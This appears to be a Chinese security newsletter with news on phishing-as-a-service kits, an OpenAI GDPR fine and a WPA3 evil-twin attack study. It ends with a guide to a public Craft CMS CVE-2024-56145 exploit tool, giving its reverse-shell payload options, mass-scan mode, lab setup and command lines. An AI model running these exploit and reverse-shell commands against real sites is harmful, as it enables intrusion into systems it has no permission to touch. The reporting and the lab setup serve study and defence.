网安瞭望台第17期：Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析

国内外要闻

Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析

    在网络安全的复杂战场中，近期出现了一个值得关注的动态：名为 Rockstar 2FA 的钓鱼即服务（PhaaS）工具包遭遇变故，意外推动了另一个新生服务 FlowerStorm 的猖獗扩张。

    据 Sophos 上周发布的新报告指出，运营 Rockstar 2FA 服务的团体似乎经历了至少部分基础设施的崩溃，与该服务相关的页面已无法访问。“这并非由于执法取缔行动，而是服务后端出现了一些技术故障。” 上月末，Trustwave 首次记录了 Rockstar 2FA，它作为一种 PhaaS 服务，能让不法分子发起钓鱼攻击，窃取微软 365 账户凭据和会话 cookie，绕过多重身份验证（MFA）保护。该服务被评估为 DadSec 钓鱼工具包的更新版本，微软以 Storm - 1575 之名对其追踪，多数钓鱼页面托管于.com、.de、.ru 和.moscow 顶级域名，不过.ru 域名的使用据信已随时间减少。

    2024 年 11 月 11 日，Rockstar 2FA 似乎遭遇技术中断，转向中间诱饵页面时引发 Cloudflare 超时错误，伪造登录页面无法加载。虽然尚不清楚中断缘由，但此 PhaaS 工具包留下的空白，致使与 FlowerStorm 相关的钓鱼活动激增。FlowerStorm 至少自 2024 年 6 月起就已活跃，Sophos 称，二者在钓鱼门户页面格式及连接后端服务器窃取凭据的方法上存在相似之处，暗示可能有共同起源，且都滥用 Cloudflare Turnstile 防止页面请求来自机器人。有人怀疑 11 月 11 日的中断，要么代表其中一个团体的战略转向，要么是运营人员变动，抑或是有意拆分两项业务，现阶段尚无确凿证据将二者关联。

    使用 FlowerStorm 最频繁的目标国家包括美国、加拿大、英国、澳大利亚、意大利、瑞士、波多黎各、德国、新加坡和印度。Sophos 表示：“受攻击最严重的行业是服务业，尤其聚焦于提供工程、建筑、房地产、法律服务与咨询的公司。” 这些发现再次凸显出一种持续趋势：攻击者即便无需深厚技术专长，也能利用网络犯罪服务和通用工具大规模发动网络攻击，这为网络安全防护敲响了警钟，各方需进一步加强防范与监测，以应对此类不断演变的威胁。

意大利因 ChatGPT 违反 GDPR 数据隐私规定对 OpenAI 罚款 1500 万欧元

    在数据隐私备受瞩目的当下，意大利的数据保护机构对 ChatGPT 的开发者 OpenAI 开出了高达 1500 万欧元（约合 1566 万美元）的罚单，原因是这款生成式人工智能应用在处理个人数据方面存在诸多问题。

    早在近一年前，意大利数据保护机构（Garante）就发现 ChatGPT 在违反欧盟《通用数据保护条例》（GDPR）的情况下，使用用户信息来训练其服务。该机构指出，OpenAI 未就 2023 年 3 月发生的安全漏洞向其通报，并且在没有充分法律依据的情况下，使用用户的个人信息来训练 ChatGPT。同时，还指责该公司违背了透明度原则以及对用户的相关信息告知义务。

    此外，Garante 表示：“OpenAI 也未设立年龄验证机制，这可能会使 13 岁以下儿童面临接触与其发展程度和自我认知不符的不当回应的风险。” 除了罚款，OpenAI 还被要求开展为期六个月的宣传活动，通过广播、电视、报纸以及互联网等渠道，增进公众对 ChatGPT 运作方式的了解。

    具体而言，要让公众知晓其为训练模型所收集的数据（包括用户和非用户信息）的性质，以及用户可用来反对、更正或删除这些数据的权利。Garante 补充道：“通过这次宣传活动，ChatGPT 的用户和非用户都必须清楚如何阻止生成式人工智能使用他们的个人数据进行训练，从而切实保障他们在 GDPR 下的权利。”

    意大利曾在 2023 年 3 月下旬率先以数据保护担忧为由，对 ChatGPT 实施了临时禁令。近一个月后，在 OpenAI 解决了 Garante 提出的相关问题后，ChatGPT 才恢复访问。OpenAI 在发给美联社的一份声明中称，这一处罚决定并不合理，其打算提起上诉，称该罚款金额几乎是其在意大利那段时期营收的 20 倍。同时，它还表示致力于提供有益且尊重用户隐私权的人工智能。

    此次裁决出台之前，欧洲数据保护委员会（EDPB）曾提出一种观点，即非法处理个人数据但在部署前已进行匿名化处理的人工智能模型，并不构成违反 GDPR 的行为。该委员会表示：“如果能够证明人工智能模型后续的运行不涉及个人数据处理，那么 EDPB 认为 GDPR 并不适用。因此，初始处理的非法性不应影响模型后续的运行。”

    而且，EDPB 还认为，当控制者在模型匿名化后，对部署阶段收集的个人数据进行后续处理时，GDPR 将适用于这些处理操作。本月早些时候，该委员会还发布了关于以符合 GDPR 的方式处理向非欧洲国家进行数据转移的指南，这些指南将接受公众咨询，截止日期为 2025 年 1 月 27 日，并指出 “第三国当局的判决或决定不能在欧洲自动得到认可或执行。如果一个组织响应第三国当局对个人数据的请求，这种数据流动就构成了转移，GDPR 就会适用。”

WPA3 网络密码遭中间人攻击与社会工程学手段绕过

    在网络安全领域，近期研究有了令人担忧的发现：研究人员成功地通过结合中间人（MITM）攻击和社会工程学技术，绕过了 Wi-Fi 保护访问 3（WPA3）协议以获取网络密码。

    来自西印度群岛大学的凯尔・查迪、韦恩・古德里奇和科夫卡・汗开展的此项研究，凸显了最新无线安全标准中潜在的漏洞。WPA3 于 2018 年推出，旨在弥补其前身 WPA2 的缺陷，并为 Wi-Fi 网络提供更强的安全性。其关键特性之一是对等同时认证（SAE）协议，旨在使密码能抵御离线字典攻击。

    然而，研究人员证明可以利用 WPA3 过渡模式中的弱点，该模式用于与 WPA2 设备向后兼容。通过利用降级攻击，他们能够捕获部分 WPA3 握手信息，然后结合社会工程学技术来恢复网络密码。

    攻击方法主要包含三个主要步骤：首先，使用降级攻击捕获握手信息；其次，将用户从原始 WPA3 网络中解除认证；最后，创建一个带有强制门户的 “恶意双胞胎” 接入点以获取密码。研究人员使用树莓派来模拟 WPA3 接入点，并利用 Airgeddon 等开源工具来创建恶意接入点和强制门户。当毫无防备的用户尝试连接到虚假网络时，会被提示输入 Wi-Fi 密码，然后该密码会与捕获的握手信息进行验证。

    这项研究引发了对 WPA3 安全性的担忧，尤其是其过渡模式。研究发现，当未实施受保护管理帧（这是许多用户可能未意识到或未启用的设置）时，攻击能够成功。有趣的是，研究人员还发现一些设备无法连接到 WPA3 过渡网络，这与 Wi-Fi 联盟声称的与 WPA2 的向后兼容性相矛盾。

    虽然该攻击需要特定条件和用户交互，但它表明了保护无线网络面临的持续挑战。研究人员强调了用户教育以及正确配置 WPA3 网络以减轻此类风险的重要性。网络安全专家呼吁对 WPA3 的漏洞进行进一步调查，并开发更多的防护措施。由于 Wi-Fi 网络对于企业和个人而言都是关键基础设施，确保其安全性至关重要。

    这项研究的结果提醒人们，即使是最先进的安全协议也可能容易受到技术漏洞利用和社会工程学巧妙组合的攻击。随着 WPA3 采用率的增加，用户和制造商都必须保持警惕，并实施最佳实践以保护无线网络免受潜在攻击。研究团队计划继续开展工作，探索更多漏洞并开发对策，以增强 WPA3 和未来无线协议的安全性。他们的努力有助于在不断演变的数字安全环境中，网络安全专业人员与潜在攻击者之间持续的对抗。

知识分享

CVE-2024-56145: Craft CMS 漏洞利用工具介绍

一、工具背景与用途

    这款工具旨在利用 Craft CMS 中存在的一个漏洞，该漏洞是由 Assetnote 出色的研究团队所发现的。这个漏洞源于对用户提供的模板路径处理不当，使得攻击者能够通过特制的有效载荷实现远程代码执行（RCE）。

二、工具特点

1. 自动化 FTP 服务器：具备自动化的 FTP 服务器功能，可用于提供恶意的有效载荷，方便攻击者实施相关攻击行为。

2. 多种反向 shell 有效载荷生成：支持生成多种类型（如 bash、nc、mkfifo 等）的反向 shell 有效载荷，使用者可根据具体需求进行选择，增加了攻击手段的灵活性。

3. 漏洞检查功能：提供漏洞检查器，能够识别存在此漏洞的易受攻击目标，有助于攻击者筛选合适的攻击对象，也方便安全人员提前排查隐患。

4. 多线程支持：支持多线程运行，能够实现更快的扫描速度，在面对大量目标时可以有效提高检测或攻击的效率。

5. 易用的 CLI 界面：拥有清晰易用的命令行界面（CLI），操作过程中会给出明确的反馈信息，无论是专业安全人员还是有一定基础的使用者都能较方便地操作该工具。

三、搭建易受攻击的测试环境（设置漏洞测试实验室）

    若要设置用于测试目的的 Craft CMS 实例，可按照以下步骤进行操作：

1. 首先创建相关目录并进入：

mkdir exploit-craft && \cd exploit-craft && \

2. 配置 DDEV 项目用于 Craft CMS：

ddev config \  --project-type=craftcms \  --docroot=web \  --create-docroot \  --php-version="8.2" \  --database="mysql:8.0" \  --nodejs-version="20" && \

3. 创建 DDEV 项目：

ddev start -y && \

4. 创建指定版本的 Craft CMS：

ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \

5. 安装特定的 CMS 版本：

ddev composer require "craftcms/cms:5.5.0" \  --no-scripts \  --no-interaction --with-all-dependencies && \

6. 设置 Craft CMS 的安全密钥：

ddev craft setup/security-key && \

7. 安装 Craft CMS：

ddev craft install/craft \    --username=admin \    --password=password123 \    --email=admin@example.com \    --site-name=Testsite \    --language=en \    --site-url='$DDEV_PRIMARY_URL' && \

8. 为 PHP 启用 register_argc_argv：

mkdir -p.ddev/php/ && \echo "register_argc_argv = On" >.ddev/php/php.ini && \ddev restart && \

9. 最后输出提示信息并启动项目：​​​​​​​

echo 'Nice, ready to launch!' && \ddev launch

四、工具使用方法

查看帮助信息：
运行工具时添加 --help 标志，就能查看可用的命令，命令格式如下：

python exploit.py --help

利用命令（Exploit Command）：

若要利用某个目标的漏洞，使用以下命令格式：

python exploit.py exploit -u <TARGET_URL> -lh <LOCAL_HOST> -lp <LOCAL_PORT> -px <PAYLOAD_TYPE>

各参数含义如下：

-u 或 --url：指定目标 URL，此参数是必需的。-lh 或 --lhost：用于接收反向 shell 的本地 IP，也是必需参数。-lp 或 --lport：本地用于监听的端口，同样为必需项。-fh 或 --ftp-host：FTP 服务器主机地址。-fp 或 --ftp-port：FTP 服务器端口号。-px 或 --payload：有效载荷类型（可选 bash、nc、mkfifo 等），默认值为 bash。​​​​​​

例如：python exploit.py exploit -u https://example.com -lh 192.168.1.10 -lp 4444 -fh 127.0.0.1 -fp 2121 -px bash

检查命令（Check Command）

python exploit.py check -u <TARGET_URL> -f <FILE_WITH_URLS> -t <THREADS> -o <OUTPUT_FILE>

各参数含义如下：​​​​​​​

-u 或 --url：单个目标 URL。-f 或 --file：包含多个要扫描的 URL 的文件。-t 或 --threads：用于扫描的并发线程数量。-o 或 --output：用于保存结果的输出文件。

例如：

python exploit.py check -f urls.txt -t 10 -o results.txt

    最后需要强调的是，应秉持负责任、符合道德的态度来使用这款工具，该工具的代码仓库地址为

 https://github.com/Chocapikk/CVE-2024-56145，使用者可前往获取更多详细内容。